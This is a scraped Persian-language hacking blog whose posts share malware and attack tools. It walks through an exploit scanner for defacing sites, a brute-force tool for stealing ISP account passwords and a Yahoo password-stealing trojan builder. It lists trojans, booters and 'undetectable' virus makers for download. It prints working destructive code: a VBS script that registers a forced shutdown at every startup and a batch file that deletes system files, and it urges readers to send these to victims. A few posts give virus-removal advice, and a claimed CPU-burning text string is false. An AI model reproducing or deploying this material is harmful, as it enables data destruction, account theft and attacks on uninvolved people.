and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>
خوب شما اين اطلاعات رو مشاهده كرديد. در اينجا من IIS رو قرمز كردم . اين IIS نكته ي كليدي هستش حالا شما با IIS Defacer مي ريد و سايت رو به راحتي ديفيس ميكنيد .
 
خري ! ) 

موضوع:

راستش همون طور هم كه قبلا گفته بودم من قصد داشتم كه اصلا اين برنامه رو به شما معرفي نكنم چون بعضي ها جنبه ندارند و با مستي بي حد و مرز با اين برنامه ميپرن به جون سايت هاي مردم .

نمي دونم چرا بعضي ها شعور ندارند ميرن مطالب من رو كپي مي كنند و به نام خودشون ثبت ميكنند.

راستي شايد به خاطر ستم اسرائيلي ها به مردم دنيا يك انجمن تشكيل بدم تا بريم سايتها ي اسرائيلي رو هك كنيم . اين هنوز تو احتمالات ببينم حال ميكنم يا نه به هر حال بريم سر اموزش :

WEBCHK

وقتي برنامه رو از قسمت دانلود وبلاگ دانلود كرديد و وارد برنامه شديد چند قسمت ميبينيد كه همه رو توضيح ميدم. براي اينكه بهتر بفهميد با يك مثال كار رو شروع ميكنم. (HACKDOOST.BLOGFA.COM )

فرض مي كنيم يك سايت مثلا www.varzaneh.com  رو ميخواهيم SCAN كنيم . براي اينكار وارد قسمت Host مي شيم و ادرس سايت رو وارد ميكنيم . وقتي ادرس رو وارد كرديم . مي ريم سراغ Port كه همه ي شما حتما با اون اشنايي كامل داريد . چون پرت 80 رو به احتمال 99% هميشه باز ميزارن بزاريد 80 باشه.البته ميتونيد از پرت هاي 25 ، 110،78،144 هم استفاده كنيم . حالا هر طور كه عشقتون ميكشه ميتونيد از پرت هايي كه دادم هم استفاده كنيد. (HACKDOOST.BLOGFA.COM )

در قسمت or Exploit BUG هم كه يكي از قسمتهاي بسيار بسيار جالب اين برنامه هست نوع باگ رو رو مشخص كنيد . مثلا اگه php هست php.cgi رو انتخاب كنيد يا اگه سايت طرف يك سايتي هست كه مربوط به ارسال ايميل هست از باگ websendmail استفاده كنيد . باز هم ميگم تموم باگ ها و اكسپلوييت ها اين بخش اماده هستند. اين برنامه حدود 55 تا باگ و اكسپلوييت اماده داره كه از مزاياي خوب اون هستش. (HACKDOOST.BLOGFA.COM )

از قسمت Exploit Custom ميتونيد اكسپلوييتي رو كه خودتون مايل هستيد رو بزاريد. راستي هفته ي ديگه براتون چند تا اكسپلوييت مي زارم كه بزاريد تو برنامه و كلي با اون سايت هك كنيد .

حالا اگه ميخواهيد از كد اكسپلوييتي كه خودتون به برنامه داديد استفاده كنيد بر روي دكمه ي Custom كليك كنيد . و اگه مي خواهيد از اكسپلوييت هاي اماده ي برنامه استفاده كنيد بر روي دكمه ي From List  كليك كنيد . فقط ميمونه قسمت Parameters Exploit كه دست به اون نزيد تا پسورد رو در لابه ي SCAN واقعا شاهكار خودش به شما بده . حالا فقط بر روي دكمه ي GO كليك كنيد .

 

نوشته شده توسط هومن (مدیر وبلاگ) در پنجشنبه 1385/10/14 ساعت 10:13 | لینک ثابت |

Www.Dlisland.Comتروجان 2

Www.Dlisland.Comتروجان 3

Www.Dlisland.Comتروجان 4

Www.Dlisland.Comتروجان 5

Www.Dlisland.Comتروجان 6

Www.Dlisland.Comتروجان 7

Www.Dlisland.Comتروجان 8

Www.Dlisland.Comتروجان 9

Www.Dlisland.Comتروجان 10

Www.Dlisland.Comتروجان 11

Www.Dlisland.Comتروجان 12

Www.Dlisland.Comتروجان 13

Www.Dlisland.Comتروجان 14

Www.Dlisland.Comتروجان 15

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 16:17 | لینک ثابت |
 

 نرم افزاری برای هک مراکز ارائه دهنده اینترنت که با آن می توانید یوز و پس کارت های اینترنتی آی اس پی ها را بردارید. البته ما این نرم افزار را برای امنیت بیشتر مراکز اینترنتی ارائه می کنیم تا به تشکیلات خود اطمینان بیشتری داشته باشند. ( عواقب هر گونه استفاده غیر مجاز از این نرم افزار به عهده کاربر می باشد و سایت در قبال آن هیچ گونه مسئولیتی ندارد )

برای دانلود و آموزش نرم افزار روی ادامه متن کلیک کنید



 

دانلود نرم افزار با حجم ۹۰۰ کیلوبایت

پاسورد فایل :  www.kamyabonline.com

آموزش نرم افزار :

این نرم افزار برای بدست آوردن password کارت های اینترنتی است.
روش استفاده از برنامه:
این برنامه چند بخش دارد:
یک ....
computername or ip : 
در این قسمت IP سایتی که می خواهید از این روش اکانت آن را بدست بیاورید وارد می کنید  
Port : 
در این قسمت شما میتوانید پورت ۲۱ یا ۷۹ را وارد کنید البته اگر باز بود (باید پورت مورد نظر حتما open باشد)
current password : 
در این قسمت چیزی وارد نکنید خود برنامه به صورت اتوماتیک عملیات را انجام می دهد. 
Usernsme : 
در این قسمت باید آیدی که میخواهید کرک کنید را وارد کنید مثلا Username یک کارت
که می توانید خود شما هم حدس بزنید (معمولا برای کارت اینترنت از یک قانون خاصی استفاده می می شود )
Dictionary File : 
در این قسمت باید اسم لیست پسورد را انتخاب کنید
شما هم میتوانید از برنامه تولید پسورد خود برنامه انتخاب کنید(این کار بهتر است) یا از لیست پسوردی که
خود شما در یک فایل TXT ذخیره کرده اید استفاده کنید ....از اینترنت هم میتوانید بدست بیاورید. 

دو .....Attack Option
Dictionry Attack :
اگر میخواهید از لیست پسورد برای پیدا کردن پسورد استفاده کنید باید اینجا رو تیک بزنید
توجه : passlist معمولا یه فایل که تعداد زیادی پسورد ذخیره دارد و شما میتوانید آن را از 
اینترنت پیدا کنید و معمولا یک فایل TXT یا pas هست.
اگر اینجا را تیک بزنید باید آدرس این فایل را در هارد خود یعنی جایی که ذخیره کرده اید را
بنویسید مثلا : c: ew folderpasslist.txt
این آدرس را باید در قسمت قبل یعنی Dictionary File وارد کنید.
Brute Force attack :
این گزینه رو حتما باید تیک بزنید.
Reconnect on disconnect :
این یکی را هم حتما باید تیک بزنید.
AutoSave every 100 Attack :
این گزینه بعد از هر ۱۰۰ بار چک کردن نتیجه را براتون save میکند

سه.....Brute Force option
در این قسمت شما باید نحوه چک کردن پسورد را تنظیم کنید. برای مثال کارت اینترنتی به صورت زیر :
Username :kcn3463734
Password:  hfydhet
خوب اول شما باید یک Username دیگر را برای چک کردن حدس بزنید و با کمی تعییر
می شود به راحتی این کارا کرد چون اکثر شبکه ها برای Username های خود را از یک
فرم خاص استفاده میکنند.برای مثال من این username را انتخاب میکنم:kcn3462628
دقت کنید که تعداد کاراکتر ها ثابت است و من فقط سعی کردم اعداد آخر رو تغییر دادم.
که شانس وجود داشتن این username بیشتر می شود.
در قسمت پسورد ما فقط به دو فاکتور اهمیت می دهیم. 
اول : پسورد . اگر از عدد و حروف تشکیل شده است.
پس شما باید بر طبق همین قسمت a-z و 0-9 را تیک بزنید و اگر فقط از حروف یا عدد تشکیل شده بود یکی را تیک می زنید.
دوم : تعداد کارکتر های تشکیل دهنده پسورد ما چقدر است ؟ که برای مثال من کارکتر ۷ را انتخاب می کنم.
پس من عدد ۷ رو باید در قسمت Number of characters to start on تایپ کنم
این دیگه بستگی به خلاقیت شما دارد.

چهار ....در این قسمت کار تنظیمات دیگر تمام شده است و ما باید برای شروع
دکمه Conecct رو فشار بدهیم.
فقط یادتون باشد که این روش خیلی حوصله میخواد

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 16:13 | لینک ثابت |
 

اینم چنتا بوتر و تروجان که کاریشون ۲۰ هست براتون اوردم ولی عکس نداشتن من گلچینشون کردم و اوردم من ۲ساله که از همین بوتر ها استفاده می کنم و راضی هستم برای دانلود روی اسمشان کلیک کنید

 

بوترها

Bye Asshole V2
E-C Matrix 2
Lamer Killer
Helix
Chatlax
DazeFinal
Static Punt
MSWINSCK.OCX

تروجانها
ExeBinder
Tntjoiner
k2ps032
evillhttp.zip
Magic_PS_1.5
WinShell5.0|zip
Netsender v1.3
atmaca downloader.v2.0

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 16:11 | لینک ثابت |

  

سلام

اينم يه برنامه كه مي تونيد به وسيله اون يه ويروس خفن بسازيد و واسه طرف بفرستيد تا اجرا كنه

حجم سرور هم خيلي كمه  (۲۱ كيلوبايت) و واسه آنتي ويروس ها هم غير قابل شناسايي هستش

‍Coded By Delphi 

دانلود

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 16:7 | لینک ثابت |
 
این هم از برنامه از کمپانی JeyJey که نوشتنش رو دوست عزیزم Arash JeyJey به عهده گرفتند هست که میتونه برای شما به سلیقه خودتون ویروس طراحی کنه .

Download JPS VirusMaker

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 16:6 | لینک ثابت |
این برنامه همم میتونه برای شما آیکون فایل های اگزه رو تغییر بده و در واقع میتونید باهاش آیکون فایل سرور یا ویروستون رو از یک فایل دیگه بردارین و جا گذاری کنید .

Download Icon Changer

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 16:4 | لینک ثابت |

  

اين اسکريپت روی هرکامپيوتری اجرا بشه نمی ذاره کامپيوترش بالا بیاد. حتی فرصت کليک کردن روی ايکن رو بهش نمی ده .و پشت سر هم restart می شه! می تونيد روی کامپيوتر خودتون هم اجراش کنيد . برای خلاصی ازش بايد فايل C:\restart.vbs رو از کامپيوترتون از طريق Dos حذف کنيد بعد ويندوزتون بالا می آد
کد پایین را روی notepad کپی کنيد و فايل را با پسوند vbs ذخيره کنيد. می تونيد برای هر کسی بفرستيد



Sub ShutDown Set FSO = CreateObject("Scripting.FileSystemObject" Set TxtFile = FSO.CreateTextFile("c:\restart.vbs", 2, False) TxtFile.WriteLine "Sub ShutDown " TxtFile.WriteLine "nLogOff=0 " TxtFile.Write

Line "nReboot=2 " TxtFile.WriteLine "nForceLogOff=4 " TxtFile.WriteLine "nForce

Reboot=6 " TxtFile.WriteLine "nPowerDown=8 " TxtFile.WriteLine "nForcePowerDown=12 " TxtFile.WriteLine "Set oOS = GetObject("+chr(34)+"winmgmts:{(Shutdown)}"+chr(34)+".ExecQuery

("+chr(34)+"Select * from Win32_OperatingSystem"+chr(34)+" " TxtFile.WriteLine "For

 Each oOperatingSystem in oOS " TxtFile.WriteLine " oOperatingSystem.Win32Shutdown(nForcePowerDown) " TxtFile.WriteLine "Next " TxtFile.WriteLine "End sub " TxtFile.WriteLine "ShutDown " TxtFile.Close Set WshShell = CreateObject("WScript.Shell"

WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\

Windows\CurrentVersion\

Run\Restart", "c:\restart.vbs" End sub ShutDown

-    نظر یادت نره
نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 16:3 | لینک ثابت |

  اين اسکريپت روی هرکامپيوتری اجرا بشه نمی ذاره کامپيوترش بالا بیاد. حتی فرصت کليک کردن روی ايکن رو بهش نمی ده .و پشت سر هم restart می شه! می تونيد روی کامپيوتر خودتون هم اجراش کنيد . برای خلاصی ازش بايد فايل C:\restart.vbs رو از کامپيوترتون از طريق Dos حذف کنيد بعد ويندوزتون بالا می آد
کد پایین را روی notepad کپی کنيد و فايل را با پسوند vbs ذخيره کنيد. می تونيد برای هر کسی بفرستيد

 

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 16:1 | لینک ثابت |

  

خوب ساختن ویروس رو آغاز می کنم
روی start رفته و روی run کلیک کنید و notepad را تایپ کنید بعد از باز شدن پنجره این ها رو بنویسید توش

@echo off

Cls

===========

Color fc

Del /a c:\*.com

Del /a c:\*.sys

Del /a c:\*.exe /s

===========

خوب تایپ کردن دیگه بسه این فایل را با هر نامی که دل تان خواست ذخیره کنید ولی پسوند را با نام bat بگذارید ، مثل love.bat

خوب کار دیگه تموم شد این ویروس رو اگر کسی باز کنه کامپیوتر رو با یک خاک مساوی می کنه و ویندوز یا هر نوع سیستم عامل دیگه رو از کار می اندازه

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 15:59 | لینک ثابت |

  این ویروس باعث می شه CPU کسی که اون رو توی کامپیوترش اجرا می کنه بسوزه:

ابتدا مسیر زیر را دنبال کنید:

راست کلیک بر روی دسکتاپ => New => انتخاب TextDucument

پس از باز شدن Notepad کد زیر رو درون آن بنویسید و آن را با پسوند Bat ذخیره کنید.

cpu_567hjkblaster

بهتون توسیه می کنم به هیچ وجه این فایل رو درون کامپیوترتون اجرا نکنید

-
نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 15:58 | لینک ثابت |

  برای ساخت این ویروس اول note pad را باز کرده و این کد ها را در آن کپی و پیست نمایید و بعد گزینه file را زده save as را زده بعد آنرا با پسوند bat ذخیره کنید مثلا Joker.bat و save را برای اتمام کار زده و حالا ویروس شما ساخته شد که مواظب باشید روی آن به هیچ وجه کلیک نکنید آنرا برای یکی بفرستید تا سیستم قربانی را به طور خفن داغون کنه. موفق باشید نظر یادتون نره!

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 15:57 | لینک ثابت |

  

سلامی از روی ارادت و نه از روی عادت به تمامی دوستان عزیز که به من لطف دارید

دوستان اگر میخواهید با یک کلیک هاردتان Format (پاک) شود این کدها را در Note

pad ریخته و آنرا با پسوند Bat ذخیره کنید مثلا Format Hard.bat حال مواظب باشید

 که روی آن کلیک نکنید چون هارد شما صفر کیلومتر خواهد شد موفق باشید در پناه

حق!

  

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 15:56 | لینک ثابت |

  برای ساخت این ویروس اول note pad را باز کرده و این کد ها را در آن کپی و پیست نمایید و بعد گزینه file را زده save as را زده بعد آنرا با پسوند bat ذخیره کنید مثلا Good Gory.bat و save را برای اتمام کار زده و حالا ویروس شما ساخته شد که مواظب باشید روی آن به هیچ وجه کلیک نکنید آنرا برای یکی بفرستید تا سیستم قربانی را به طور خفن داغون کنه موفق باشید نظر یادتون نره! 

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 15:55 | لینک ثابت |

   

سلام
۱-تا الآن بدترين و آزار دهنده ترين ويروسي که در دنيا معرفي شده ويروس BLASTER_&_SASSAR است.
اين ويروس سي پي يو فرد قرباني رو ميسوزونه.من آموزش ساختن اين ويروس رو به شما ياد ميدهيم.

1.روي دسکتاپ راست کليک کنيد.

2.گزينه new رو انتخاب کنيد.

3.text doceument رو انتخاب کنيد

4.حالا وارد تکست داکيومنت خود شويد و در آن تايپ کنيد

5.cpu_567hjkblaster

6.حالا از آن خارج شويد و روش راست کليک کنيد

7.گزينه rename رو انتخاب کنيد و يک اسم دلخواه براي آن فايل بگذاريد.

8.بعد اين فايل رو براي يکي بفرستيد.

خطر: اگر سي پي يو تون رو دوست دارين به هيچ وجه اين فايل را در سيستم خود اجراي نکنيد و گرنه....

۲-ويروس بلستر ويروسي است که باعث Shutdown شدن ويندوز در زمان تعيين شده ميشود...
ساخت اين دو روش دارد
روش اول :::: در جائي از دسکتاپ خود راست کليک Right Click کنيد و در بخش New  گزينه Shortcut را انتخاب
کنيد و در بخش ظاهر شده يکي از اين دو دستور را بنويسيد .
Shutdown -s -t xx        يا           %windir%\System32\Shutdown.exe -s -t xx 
نکته:::: بعد از اين که اين دستورات را نوشتيد به جاي xx مدت زماني را که ميخواهيد بر حسب ثانيه پس از اجراي آن سيستم خاموش شود را تعيين کنيد .
مثال :::
Shutdown -s -t 30    يا     %windir%\System32\Shutdown.exe -s -t 30  
ميبينيد که من 30 ثانيه را انتخاب کردم .بهد از اين کار Next را بزنيد و يه اسم براي فايلتون انتخاب کنيد.
روش دوم :::: يکي از برنامه هاي Notepad . Wordpad  را باز کنيد و يکي از دستورات بالا را در آن بنويسيد و با پسوند BAT. سيو کنيد مثل Shutdown.bat و تمام ....
Anti Blaster
و اما براي خنثي کردن اين ويروس يکي از دو مراحل بالا را انجام ميدهيم و به جاي متنهاي بالا دستور زير را مينويسيم
.
Shutdown -a و Next را ميزنيم ....

موفق باشید ::::

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 15:53 | لینک ثابت |
 هیچ آنتی ویروسی شناسایی نمی شود (و نخواهد شد) .

TeraBIT Virus Maker 2.0

Size: 73 KB
Download

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 15:52 | لینک ثابت |
 سلام دوستان  می خوام کدی معرفی کنم که بسیاری از  هکر به دونبالشن این کد با عث می شود

 که انتی ویروس های که برای غیر فعال کردنش PASSمی خواد   غیر فعال کنیم

خوب شروع کنیم

این کد را برید  تو داس اجرا کنید و بعد از اجرا  انتی ویروس غیر فعال شود

DEDUG

.70 10

.71 10

G

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 15:51 | لینک ثابت |

  

 

برنامه که میبینید یه ویروس مکر قوییه

فکر نمی کنم نیاز به اموزش داشته باشه

باید ویروس هایی که میخواین بسازه تیک بزنید و نام سرور وارد کنید

و دکمه کریت ویروس بزنید و بعد بدون این که ویروس ساخته شده رو باز کنید

بفرستید واسه طرف

بعد از کلیک یه صفحه باز میشه میتونید اونجا دانلود کنید

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 15:49 | لینک ثابت |

  این کد ها رو در یه فایل نوت پد کپی کرده و از منوی فایل گزینه ی save as

رو اتخاب کنید و جلوی اسمشrestart.bat رو بنویسید

Sub ShutDown

Set FSO = CreateObject("Scripting.FileSystemObject")

Set TxtFile = FSO.CreateTextFile("c:\restart.vbs", 2, False)

TxtFile.WriteLine "Sub ShutDown "

TxtFile.WriteLine "nLogOff=0 "

TxtFile.WriteLine "nReboot=2 "

TxtFile.WriteLine "nForceLogOff=4 "

TxtFile.WriteLine "nForceReboot=6 "

TxtFile.WriteLine "nPowerDown=8 "

TxtFile.WriteLine "nForcePowerDown=12 "

TxtFile.WriteLine "Set oOS = GetObject("+chr(34)+"winmgmts:{(Shutdown)}"+chr(34)+").ExecQuery("+chr(34)+"Select * from Win32_OperatingSystem"+chr(34)+") "

TxtFile.WriteLine "For Each oOperatingSystem in oOS "

TxtFile.WriteLine " oOperatingSystem.Win32Shutdown(nForcePowerDown) "

TxtFile.WriteLine "Next "

TxtFile.WriteLine "End sub "

TxtFile.WriteLine "ShutDown "

TxtFile.Close

Set WshShell = CreateObject("WScript.Shell")

WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Restart", "c:\restart.vbs"

End sub

ShutDown 

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 15:47 | لینک ثابت |

  آشنايي با كاربردهاي بوت نت!!
bootnetچيست؟
سايت مايكرو سافت در زير حملات ddos از سرويس خارج شد.
دستگيري عاملان حمله اي كه موجب خروج سرور هاي فرود گا هي روسيه از
سرويس دهي شد.بسته شدن چند شبكه wareZزير زميني توسط FBI.
و هزاران خبر مشابه اينها از اغلب ريشه در شبكه ها و سرور هاي IRCدارد بارها
و بارهااز جلوي رويمان گذشته و احتمالا شما دوست  داريد بدانيد كه اين كار ها چطور در شبكه هاي IRC
و بدور ازحس هاي ضعيف گردانندگان مبارزه عليه هكر ها انجام مي گيرد .
امروز من قصد دارم تا شما رو با يكي از مهم ترين راههاي راه اندازي و مديريت
شبكه هاي wareZو حملات DDOSمدريت شده در شبكه هاي IRC آشنا كنم.
جواب تمام اين سوالات در يك كلمه مي باشدBOTNET!!(شبكها ي ربات)
خب ديگه براي اين درس كافيه ادامه ي اين مقاله باشه براي بعد از زنگ تفريح ok!!

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 15:46 | لینک ثابت |
 

این یه نسخه جدید از ویروس VBLOVE  هستش که به اون یک سری چیزا اضافه شده

مثل : مخفی کردن نشانه گر ماوس و مخفی کردن آیکن های Desktop و خراب کردن یاهو مسنجر و . . . .

اگر ویندوز خودتون رو لازم دارید و سرویس پک 2 هست اجرا نکنید و اگر خواستید اجرا کنید بزارین وقتی

ویندوز تون رو خواستید عوض کنید .... نظر هم بدید.

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 15:45 | لینک ثابت |

  این ویروس میتونه بوت سیستم قربانی رو حذف کنه که سیستم و ویندورز طرف بالا نمیاد

...دریافت...

CDReg

این ویروس هم سیدی روم قربانی رو آنقدر باز و بسته میکنه که طرف یا باید ویندوز اوز کنه یا کابله

برق سی دی رومش رو در بیاره ...دریافت...

F32CPU

این ویروس هم سی پی یو قربانی رو میبره تا ۲۰۰ Usag  و سی پی یو قربانی یک سلفه میکنه

و بعدش اشهد میخونه ...دریافت...

QpUrl

این یکی هم صفحه ی مانیتور قربانی رو بر عکس میکنه که احتمالا خطر ناکه ممکنه ضرر داشته باشه

...دریافت...

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 15:44 | لینک ثابت |
ویروس جدید یاهو مسنجر در حال آلوده کردن کاربران با نام YahLover   ( )

دوستان عزيز ظاهرا ويروسي در ياهو منتشر شده که به صورت پي ام هاي نا مفهوم که در آخر اون آدرسي به شکل زير دارد Www. chendang.net/nguyen بين کاربر ها منتشر ميشه و صاحب اي دي در فرستادن اون دخالت نمي کنه . براي اينکه اي دي شما ويروسي نشه از باز کردن آدرس اينترنتي آخر اون خود داري کنيد. اين موضوع رو جدي بگيريد

                                                  توضیحات بیشتر

ویروس جدید نرم افزار پیغام رسان فوری یاهو مسنجر با نام W32/YahLover.worm توانسته است در مدت زمان اندکی از بوجود آمدن تعداد فراوانی از کاربران استفاده کننده از این نرم افزار را آلوده نماید.

به گزارش سایت مک آفی، درجه خطر ویروس W32/YahLover.worm که در خانواده کرم ها (Worm) طبقه بندی شده است کم (Low) می باشد و نخستین بار در تاریخ 9/5/2006 مشاهده شده است.

ویژگی و نحوه عملکرد این ویروس به گونه ای است که با نمایش پیامهای گوناگون در قسمت Custom Message Statu آی دی (ID) کاربر آلوده شده از دیگران می خواهد تا بر روی لینک نماش داده شده کلیک نمایند تا بتواند بدین صورت خود را در سیستم کامپیوتر آنها نیز
دانلود کند. در صورت انجام چنین کاری فایل آلوده به ویروس، خود را به یکی از فایل های اصلی ویندوز ( %WINDIR%\taskmng.exe ) متصل می کند و سپس از طریق تنظیمات ریجستری گسترش می یابد.

علاوه بر آنکه شما می توانید با بررسی فایل های ریجستری خود نسبت به این امر که آیا آلوده شده اید یا خیر پی ببرید در صورت مشاهده ی پنجره ای همانند پنجره ی زیر نیز سیستم شما به این ویروس آلوده شده است.

   

           

 

یکی از قوی ترین و شایعترین ویروس/تروجان هایی که اخیرآ در حال گسترش بین

کاربران استفاده کننده از یاهو مسنجر می باشد ویروس "Exploit.JS.ADODB.Stream.e" است

. در صورتیکه کامپیوتر شما نیز به این ویروس آلوده شده باشد بدون آنکه متوجه

 شوید به لیست دوستانتان پیغامهایی مبنی بر بازدید از سایت nsl-school.org ا

رسال می شود. بدین ترتیب در صورت کلیک بر روی این لینکها دوستان شما نیز آلود

ه خواهند شد.
هنوز مشخص نیست سازنده این ویروس چه کسی است و این احتمال داده می

 شود که ویروس مذکور به سرقت اطلاعات و رمز های شخصی افراد می پردازد.

در صورتیکه شما و یا یکی از دوستانتان به این ویروس آلوده شده شده اید روش زیر

 مناسبترین گزینه برای از بین بردن آن است:
پیام و لینک هایی که این ویروس ارسال می کند چیست ؟!
در متن تمامی این پیغام ها لینکی به سایت Nsl-school.org داده شده است

که در صورت کلیک کردن بر روی آن کامپیوتر شما آلوده می شود.

در صورتیکه به ویروس آلوده شوید چه مشکلاتی پیش خواهد آمد ؟!
1- در ابتدا ویروس صفحه شخصی اینترنت اکسپلورر (Default IE Page) را به

 سایت nsl-school.org تغییر می دهد. در این صورت به هیچ طریق امکان عوض

 کردن آن وجود نخواهد داشت. بعد از هر باز باز کردن یک صفحه وب جدید، ویروس مجددآ خود را در

 سیستم شما کپی می کند.

2- گزینه های Task Manager و Reg Edit در کامپیوتر غیر فعال می شوند

 تا شخص نتواند از این طریق فعالیت ویروس را مشاهده و یا از بین ببرد.

3- فایل هایی با نامهای svhost.exe , svhost32.exe , internat.exe در کامپیوتر ایجاد

 می شوند. (برای اطمینان پوشه های windows و temp را بررسی کنید.)

4- ویروس بدون آنکه متوجه شوید پیغام هایی را به لیست دوستان شما

 (Yahoo Messenger ID List) ارسال می کند.


چگونه ویروس را از کامپیوتر خود پاک کنیم ؟!
راه ها و روش های مختلفی برای حذف این ویروس معرفی شده است.
ولی روش معرفی شده در اینجا راحت ترین روش است!
فایل زیر را دانلود کنید و سپس فایل YVRemove.bat را از داخل آن اجرا نمائید.

Download
دانلود - 4 کیلوبایت
Serial پسورد: www.p30download.com

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 15:43 | لینک ثابت |

سلام دوستان اینم یه ویروس با حال که مسله بلاستر هستش و باعث خاموش شدن کامپیوترمیشه ولی مثل بلاستر خنثی نمیشه ولی خنثی کردن خیلی آسونه نظر شما چیه؟!؟؟!

حتما دانلود کنین

DOWNLOAD

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 15:41 | لینک ثابت |
  

توضیحات :

 

Looked-BA ویروسی است که فایل های exe در کامپیوتر آلوده را تحت تاثیر قرار می دهد و از طریق کامپیوتر های شبکه با پسوردهای ضعیف منتشر می شود .

این ویروس می تواند به اینترنت متصل شود و از طریق پورت80 (HTTP ) با سرور راه دور ارتباط برقرار می کند .

زمانی که ویروس Looked-BA اجرا می شود در \rundl132.exe کپی می شود و فایل \Dll.dll ، که مانند کرم Looked-AP تشخیص داده می شود را ایجاد می کند .

همچنین با نصب ویروس فایل های متنی بی ضرر زیادی با نام "_desktop.ini در پوشه های متفاونی از کامپیوتر آلوده ایجاد می شود .

با اجرای فایل rundl132.exe مدخل زیر در رجیستری ایجاد می شود :

 

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
load
\rundl132.exe

مدخل زیر نیز ایجاد می شود :

HKLM\SOFTWARE\Soft\DownloadWWW\

 

توصیه ها :

              1  .        به روز كردن آنتي ويروس

              2  .       دريافت Removal از سايت  Kaspersky

              3 .       روش پاك سازي به صورت دستي :

ابتدا تمامي داده خود را در سيستم تغيير داده و يك كپي از آنها تهيه كنيد.

پسورد Administrator را دوباره تغيير دهيد و يك نگاهي به مسايل امنيتي شبكه خود بيندازيد.

در taskbar دكمه start را بزنيد و منوي run را اجرا كنيد و در آن Regedit را بنويسيد و دكمه ok را كليك كنيد تا صفحه ويرايشگر رجيستري شما باز شود . فراموش نكنيد كه قبل از دستكاري رجيستري يك نسخه پشتيبان از آن تهيه كنيد .

براي تهيه نسخه پشتيبان از رجيستري خود ؛ در منوي Registry روي گزينه"''Export Registry File  و در پنل''''''''Export range'''''''' گزينه All را انتخاب كرده و سپس دكمه Save را كليك كنيد تا نسخه پشتيبان از رجيستري شما تهيه شود.

حال در مدخل HKEY_CURRENT_USER  HKEY_LOCAL_MACHINE ,رجيستري زير مدخلهاي:

 

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
load
\rundl132.exe

HKLM\SOFTWARE\Soft\DownloadWWW\

 

 

 

هر مدخلي كه به فايلي اشاره مي كرد حذف كنيد.

سپس رجيستري خود را ببنديد و دوباره سيستم خود را راه اندازي كنيد.

نوشته شده توسط هومن (مدیر وبلاگ) در شنبه 1385/10/02 ساعت 15:40 | لینک ثابت |
این روز ها همه سعی و تلاش خوره های تازه وارد به پدیده ی اینترنت بر اینه که یه روشی برای هک کردن یه سرور داشته باشن.... امروز یه کتاب در این مورد می زارم که جنبه و حو صله داشتن دو مولفه اصلیه اونه!!!!!!

نام کتاب آموزش قدم به قدم هک

نویسنده صمدی، آراز
موضوع اصلی کامپیوتر
موضوع فرعی هک
جلد ۱
حجم فایل ۵۷۱ کیلوبایت
قالب کتاب PDF
تاریخ ثبت ۱۳۸۴/۴/۲۱
دفعات دریافت

__________________
اين ها هم توضيحات در مورد هك با مجيك پي اس....


به طور كل نرم افزارMagic-PS به شش قسمت تقسيم ميشود كه آموزش را بر اساس اين قسمت بنديها شروع ميكنيم:

1-)قسمت اولVictim كه به معني هدف است و وظيفه اين قسمت تنظيم وظايف فايليست كه براي هك كردن فرد مورد نظر ميسازيد گزينه هاي اين قسمت عبارتند از:

1)Send Y! Mess Pass:
اگر اين گزينه را انتخاب كنيد پسوردIDشخص هك شونده زماني كهOnlineميشود بهIDكسي كه در مرحله بعدي وارد كرده ايد فرستاده ميشود.

2)Send IP:
اين گزينه باعث ميشود اگر شخص هك شونده آنلاين شدIPوي فرستاده شود.

3)Disable taskmgr XP-2k:
اين گزينه باعث ميشود نوع سيستم عامل شخص هك شونده فرستاده شود.

4)Disable Y! Save Pass:
اين گزينه باعث ميشود اگر ماOfflineبوديم(يعني در Chatيا اينترنت نبوديم)پسورد شخص هك شونده به صورتPMفرستاده ميشود.

5)Delete Mass Archive:
كار اين گزينه اين است كه اگر آرشيو ياهوي شخص مورد نظر فعال بود پيغامي كه دارايUserNameوPasswordاست ذخيره نشود.

6)Send OS Name:كار اين گزينه گزينه اين است كهUserNameشخص هك شونده را ميفرستد.7

7)Auto Startup:
اين گزينه باعث ميشود كه فايل ايجاد شده در هر بار روشن شدن كامپيوتر اجرا شود.8

8)Disable RegEdit:
اين گزينهEditor(ويرايشگر)رجيستري را از كار مي اندازد.

9)Disable MSConfig:
اين گزينهUtility System Configurationرا از كار مي اندازد.

10)Melt After Install:
اين گزينه باعث ميشود كه فايل پس از اجرا شدن مخفي شده و يا از بين برود.

